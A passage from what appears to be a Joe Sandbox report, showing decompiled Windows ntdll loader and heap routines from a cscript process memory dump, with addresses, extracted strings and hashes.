						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E054F9A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x054c8799
0x054c879d
0x054c87a1
0x054c87a3
0x054c87a8
0x054c87c3
0x054c87c3
0x054c87c8
0x054c87d1
0x054c87d4
0x054c87d8
0x054c87e5
0x054c87ec
0x05519bfe
0x05519c00
0x05519c02
0x05519c08
0x05519c0d
0x05519c0f
0x05519c14
0x05519c2d
0x05519c32
0x05519c37
0x05519c3a
0x05519c3c
0x05519c42
0x05519c42
0x05519c3c
0x05519c02
0x054c87da
0x054c87df
0x054c87e3
0x00000000
0x00000000
0x054c87e3
0x054c87f2
0x00000000
0x054c87fb
0x054c87fd
0x054c87fe
0x054c880e
0x054c880f
0x054c8810
0x054c8814
0x054c881a
0x054c881c
0x054c881f
0x054c8821
0x054c8822
0x054c8824
0x054c8826
0x054c882c
0x054c882e
0x05519c48
0x05519c48
0x054c8834
0x054c8834
0x054c8837
0x00000000
0x00000000
0x054c8837
0x054c882e
0x054c883d
0x054c8840
0x054c8843
0x054c8846
0x054c8849
0x054c884c
0x054c884e
0x054c8850
0x054c8852
0x054c8854
0x054c8857
0x054c88b4
0x054c88b6
0x054c88b6
0x054c8859
0x054c8859
0x054c8859
0x054c8861
0x054c8866
0x054c886a
0x054c893d
0x054c8941
0x00000000
0x054c8947
0x054c8947
0x054c894a
0x054c894c
0x00000000
0x054c8952
0x054c8955
0x054c895a
0x054c895d
0x054c895d
0x054c895f
0x054c8961
0x054c8961
0x054c8968
0x00000000
0x00000000
0x054c896a
0x054c896b
0x054c896e
0x00000000
0x054c8970
0x054c8970
0x054c8970
0x054c8970
0x054c8972
0x054c8972
0x054c8974
0x00000000
0x054c897a
0x054c897a
0x054c897d
0x00000000
0x054c8983
0x05519c65
0x05519c6d
0x05519c72
0x05519c75
0x05519c75
0x05519c82
0x05519c86
0x05519c87
0x05519c88
0x05519c89
0x05519c8c
0x05519c90
0x05519c95
0x05519c97
0x05519ca0
0x05519ca3
0x05519ca9
0x05519ca9
0x00000000
0x05519ca9
0x05519ca3
0x00000000
0x05519c97
0x054c897d
0x00000000
0x054c8974
0x054c8988
0x054c8992
0x054c8996
0x00000000
0x054c8996
0x054c894c
0x00000000
0x054c8870
0x054c887b
0x054c887d
0x054c887f
0x054c8881
0x054c8884
0x054c8884
0x054c8886
0x054c8889
0x054c888c
0x054c888e
0x054c8891
0x054c8891
0x054c8898
0x00000000
0x00000000
0x054c889a
0x054c889b
0x054c889e
0x00000000
0x00000000
0x054c88a0
0x054c88a8
0x054c88b0
0x054c88b2
0x054c88d3
0x054c88d5
0x00000000
0x054c88d7
0x054c88db
0x054c88dc
0x054c88e0
0x054c88e8
0x054c88ee
0x054c88f0
0x054c88f3
0x054c88fc
0x054c8901
0x054c8906
0x054c890c
0x054c890c
0x054c890f
0x054c8916
0x054c8917
0x054c8918
0x054c8919
0x054c891a
0x054c891f
0x054c8921
0x05519c52
0x05519c55
0x05519c5b
0x05519cac
0x05519cc0
0x05519cc0
0x05519c55
0x054c8927
0x054c8927
0x054c892f
0x054c8933
0x00000000
0x054c88f5
0x054c88f5
0x00000000
0x054c88f7
0x054c88f7
0x054c88fa
0x00000000
0x00000000
0x00000000
0x00000000
0x054c88fa
0x054c88f5
0x054c88f3
0x00000000
0x054c88d5
0x00000000
0x054c88b2
0x054c88c9
0x00000000
0x054c88c9
0x054c887f
0x054c886a
0x054c8857
0x054c8852
0x054c88bf
0x054c88bf
0x054c87aa
0x054c87ad
0x054c87ae
0x054c87b4
0x054c87b5
0x054c87b6
0x054c87b8
0x054c87bd
0x054c87c1
0x054c87f4
0x054c87fa
0x00000000
0x00000000
0x00000000
0x054c87c1
0x00000000

Strings

LdrpDoPostSnapWork, xrefs: 05519C1E
LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 05519C18
minkernel\ntdll\ldrsnap.c, xrefs: 05519C28

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 0-1948996284
Opcode ID: 5b5a7d7dea066a44c475b7ce3b57edb1932308b6d7c2c1e0b1c57fabba80156c
Instruction ID: 8623e08a7a19e8a1cbef2016e2229666409be778eba226d40cdae5f920e9bacb
Opcode Fuzzy Hash: 5b5a7d7dea066a44c475b7ce3b57edb1932308b6d7c2c1e0b1c57fabba80156c
Instruction Fuzzy Hash: E891E475A04216ABDF58DF59C8819FABBB6FFC4304F1540EFE845AB640E730A905CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 054C7E41, Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E054C7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E054CCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E054BC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x55a5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E05535510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x55a5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E054D7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E054D7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E05537016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E054D7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E054D7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E05537016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E054EA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E054BB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x054c7e4c
0x054c7e50
0x054c7e55
0x054c7e58
0x054c7e5d
0x054c7e71
0x054c7f33
0x054c7e77
0x054c7e77
0x054c7e79
0x054c7e79
0x054c7e7e
0x054c7f45
0x05519848
0x00000000
0x05519848
0x054c7f4e
0x054c7f53
0x054c7f5a
0x00000000
0x00000000
0x0551985a
0x05519862
0x05519866
0x00000000
0x0551986c
0x00000000
0x0551986c
0x054c7e84
0x054c7e84
0x054c7e8d
0x05519871
0x054c7eb8
0x054c7ec0
0x054c7ec0
0x054c7e9a
0x0551987e
0x00000000
0x00000000
0x05519884
0x0551988b
0x055198a7
0x055198ac
0x055198b1
0x055198b6
0x055198b8
0x055198b8
0x055198b9
0x00000000
0x055198b9
0x054c7ea0
0x054c7ea7
0x00000000
0x00000000
0x054c7eac
0x054c7eb1
0x054c7ec6
0x054c7ed0
0x055198cc
0x054c7ed6
0x054c7ed6
0x054c7ed6
0x054c7ede
0x054c7ee3
0x055198e3
0x055198f0
0x05519902
0x055198f2
0x055198fb
0x055198fb
0x05519907
0x0551991d
0x0551991d
0x05519907
0x055198e3
0x054c7ef0
0x054c7f14
0x054c7f14
0x054c7f1e
0x05519946
0x054c7f24
0x054c7f24
0x054c7f24
0x054c7f2c
0x0551996a
0x05519975
0x05519975
0x0551997e
0x05519993
0x05519993
0x0551997e
0x00000000
0x054c7ef2
0x054c7efc
0x054c7f0a
0x054c7f0e
0x05519933
0x00000000
0x05519933
0x00000000
0x054c7f0e
0x00000000
0x00000000
0x00000000
0x054c7eb1

Strings

Could not validate the crypto signature for DLL %wZ, xrefs: 05519891
minkernel\ntdll\ldrmap.c, xrefs: 055198A2
LdrpCompleteMapModule, xrefs: 05519898

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: 2fe65075c69c26546633ea393855c499a8979944f14072497132a999f5f5a843
Instruction ID: 0da9fe591633092ab954e08e2bf3275d6952b59b34204042fd8cd80caea51e26
Opcode Fuzzy Hash: 2fe65075c69c26546633ea393855c499a8979944f14072497132a999f5f5a843
Instruction Fuzzy Hash: 7E51033A6047419BEB29CB59C894BAABFE5FB82710F1405DEE8529B3D1D730ED01CB94

Uniqueness

Uniqueness Score: -1.00%

Function 054BE620, Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E054BE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E054BF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E054F95D0();
						}
						if(_t78 != 0) {
							L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E054FFA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E054FBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E054F9600();
					if(_t97 < 0) {
						goto L6;
					}
					E054FBB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L054BF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E054FBB40(_t83, _t102 + 0x24, _t78);
								if(L054C43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E054FBB40(_t84, _t102 + 0x24, _t94);
									if(L054C43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x054be620
0x054be628
0x054be62f
0x054be631
0x054be635
0x054be637
0x054be63e
0x05515503
0x05515503
0x054be64c
0x054be64c
0x054be651
0x00000000
0x00000000
0x054be661
0x054be665
0x0551542a
0x054be715
0x054be71a
0x054be71c
0x054be720
0x054be720
0x054be727
0x054be736
0x054be736
0x054be743
0x054be743
0x054be673
0x054be678
0x054be67d
0x054be682
0x054be685
0x054be692
0x054be69b
0x054be6a3
0x054be6ad
0x054be6b1
0x054be6b2
0x054be6bb
0x054be6bf
0x054be6c0
0x054be6c8
0x054be6cc
0x054be6d5
0x054be6d9
0x00000000
0x00000000
0x054be6e5
0x054be6ea
0x054be6f9
0x054be70b
0x054be70f
0x05515439
0x0551545e
0x0551545e
0x00000000
0x0551545e
0x0551543b
0x0551543e
0x05515440
0x05515445
0x05515472
0x05515475
0x0551548d
0x05515493
0x055154a9
0x00000000
0x00000000
0x055154ab
0x055154b4
0x055154bc
0x055154c8
0x055154de
0x055154fb
0x055154e0
0x055154e6
0x055154eb
0x055154eb
0x055154de
0x00000000
0x055154bc
0x05515477
0x0551547a
0x05515480
0x05515483
0x05515486
0x0551548b
0x00000000
0x00000000
0x00000000
0x0551548b
0x00000000
0x00000000
0x00000000
0x00000000
0x05515447
0x05515447
0x05515447
0x05515447
0x0551544e
0x00000000
0x00000000
0x05515450
0x05515452
0x05515455
0x0551545a
0x00000000
0x00000000
0x00000000
0x0551545c
0x0551546a
0x0551546d
0x0551546f
0x00000000
0x0551546f
0x054be70f

Strings

InstallLanguageFallback, xrefs: 054BE6DB
@, xrefs: 054BE6C0
\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 054BE68C

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: 8d40eb6916b288c5b64efac5f63eab6f396f684e1333e3ec6c3c8e43d199d5d5
Instruction ID: 7bf6af60d5ac4a4ec51346cb89d92c107ef0799bcedc268812c04a4a3915e8b2
Opcode Fuzzy Hash: 8d40eb6916b288c5b64efac5f63eab6f396f684e1333e3ec6c3c8e43d199d5d5
Instruction Fuzzy Hash: D651BD766083059BEB10DF64C444AEBB7E8BFC8614F05092FF98597200F7B4DA148BA6

Uniqueness

Uniqueness Score: -1.00%

Function 0557E539, Relevance: 2.8, Strings: 2, Instructions: 261
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E0557E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E0557BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E0557BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E0557AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E054F9730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E0557A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E0557A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E054F9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E0557A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E0557A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E054D2280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E054CB090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E054CFFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E054D7D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E0556FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}

0x0557e547
0x0557e549
0x0557e54f
0x0557e553
0x0557e557
0x0557e55a
0x0557e55c
0x0557e55f
0x0557e561
0x0557e567
0x0557e56b
0x0557e7e2
0x00000000
0x0557e571
0x0557e575
0x0557e577
0x0557e57b
0x0557e57c
0x0557e57d
0x0557e57e
0x0557e57f
0x0557e588
0x0557e58f
0x0557e591
0x0557e592
0x0557e592
0x0557e596
0x0557e59e
0x0557e5a0
0x0557e5a6
0x0557e61d
0x0557e61d
0x0557e621
0x0557e623
0x0557e630
0x0557e630
0x0557e7e6
0x0557e7eb
0x0557e7ed
0x0557e7f4
0x0557e7fa
0x0557e7ff
0x0557e7ff
0x0557e80a
0x0557e812
0x0557e812
0x0557e5ab
0x0557e5b4
0x0557e5b9
0x0557e5be
0x0557e5c0
0x0557e5c2
0x0557e5c8
0x0557e5c9
0x0557e5cb
0x0557e5cc
0x0557e5d5
0x0557e5e4
0x0557e5f1
0x0557e5f8
0x0557e5f8
0x0557e5d5
0x0557e602
0x0557e616
0x0557e63d
0x0557e644
0x0557e64d
0x0557e652
0x0557e657
0x0557e659
0x0557e65b
0x0557e661
0x0557e662
0x0557e664
0x0557e665
0x0557e66e
0x0557e67d
0x0557e68a
0x0557e691
0x0557e691
0x0557e66e
0x0557e6b0
0x00000000
0x0557e6b6
0x0557e6bd
0x0557e6c7
0x0557e6d7
0x0557e6d9
0x0557e6db
0x0557e6de
0x0557e6e3
0x0557e6f3
0x0557e6fc
0x0557e700
0x0557e700
0x0557e704
0x0557e70a
0x0557e70a
0x0557e713
0x0557e716
0x0557e719
0x0557e720
0x0557e761
0x0557e76b
0x0557e774
0x0557e77a
0x0557e77a
0x0557e78a
0x0557e791
0x0557e799
0x0557e79b
0x0557e79f
0x0557e7aa
0x0557e7c0
0x0557e7ac
0x0557e7b2
0x0557e7b9
0x0557e7b9
0x0557e7c7
0x0557e806
0x00000000
0x0557e7c9
0x0557e7d1
0x0557e7d8
0x00000000
0x0557e7d8
0x00000000
0x00000000
0x0557e722
0x0557e72e
0x0557e748
0x0557e74c
0x0557e754
0x0557e756
0x0557e75c
0x0557e75c
0x00000000
0x0557e75c
0x0557e758
0x0557e758
0x00000000
0x0557e758
0x0557e750
0x00000000
0x00000000
0x0557e752
0x00000000
0x0557e752
0x0557e730
0x0557e735
0x0557e73d
0x0557e73f
0x00000000
0x00000000
0x0557e741
0x0557e741
0x00000000
0x0557e741
0x0557e739
0x00000000
0x00000000
0x0557e73b
0x00000000
0x0557e73b
0x0557e722
0x0557e720
0x0557e6b0
0x0557e618
0x00000000
0x0557e618

Strings

`, xrefs: 0557E5D7
`, xrefs: 0557E670

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction ID: 4237866964cd0298e9dda71ca58dd107d44ed373cc7dc963ee0ce8b7329fad00
Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction Fuzzy Hash: 2C918F3120834A9FE724CE35D846B1BB7EABF84714F1489ADF596CB280E774E804CB51

Uniqueness

Uniqueness Score: -1.00%

Function 055351BE, Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E055351BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x55905f0);
				E0550D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E054CEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E055353CA(0);
						return E0550D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E054FF3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E054D3690(1, _t117, 0x5491810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
